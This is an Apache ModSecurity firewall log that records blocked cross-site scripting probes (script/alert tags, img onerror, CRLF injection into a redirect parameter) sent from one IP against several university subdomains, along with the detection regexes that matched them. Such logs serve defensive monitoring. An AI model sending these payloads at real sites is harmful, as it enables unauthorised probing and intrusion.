[Tue Aug 29 11:53:10.425599 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoZ6S4AAAAK"]
[Tue Aug 29 11:53:10.428105 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tsCo-f0AAAfWOUsAAAAL"]
[Tue Aug 29 11:53:10.430557 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAoLfQYAAAAG"]
[Tue Aug 29 11:53:10.660298 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAoqbPMAAAAj"]
[Tue Aug 29 11:53:10.734136 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tsCo-f0AAAoml1kAAAAf"]
[Tue Aug 29 11:53:10.820445 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAojao0AAAAb"]
[Tue Aug 29 11:53:10.822870 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAoAkxAAAAAC"]
[Tue Aug 29 11:53:10.824734 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAor7pYAAAAk"]
[Tue Aug 29 11:53:10.825281 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAohZ60AAAAZ"]
[Tue Aug 29 11:53:10.828315 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAofm5EAAAAX"]
[Tue Aug 29 11:53:11.798691 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAolKUEAAAAe"]
[Tue Aug 29 11:53:11.800177 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoAkxEAAAAC"]
[Tue Aug 29 11:53:11.844070 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoZ6TMAAAAK"]
[Tue Aug 29 11:53:11.918247 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAoocwsAAAAh"]
[Tue Aug 29 11:53:11.920841 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15t8Co-f0AAAoLfQoAAAAG"]
[Tue Aug 29 11:53:11.924103 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAnd3QgAAAAI"]
[Tue Aug 29 11:53:11.927179 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAog@CoAAAAY"]
[Tue Aug 29 11:53:12.030597 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAoAkxIAAAAC"]
[Tue Aug 29 11:53:12.031825 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAnTlaIAAAAA"]
[Tue Aug 29 11:53:12.084197 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoesLwAAAAV"]
[Tue Aug 29 11:53:12.102366 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoLfQsAAAAG"]
[Tue Aug 29 11:53:12.119039 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAohZ7AAAAAZ"]
[Tue Aug 29 11:53:12.129287 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAoW7NYAAAAJ"]
[Tue Aug 29 11:53:12.191078 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAoqbPgAAAAj"]
[Tue Aug 29 11:53:12.561198 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAni-CAAAAAU"]
[Tue Aug 29 11:53:12.608660 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAog@CsAAAAY"]
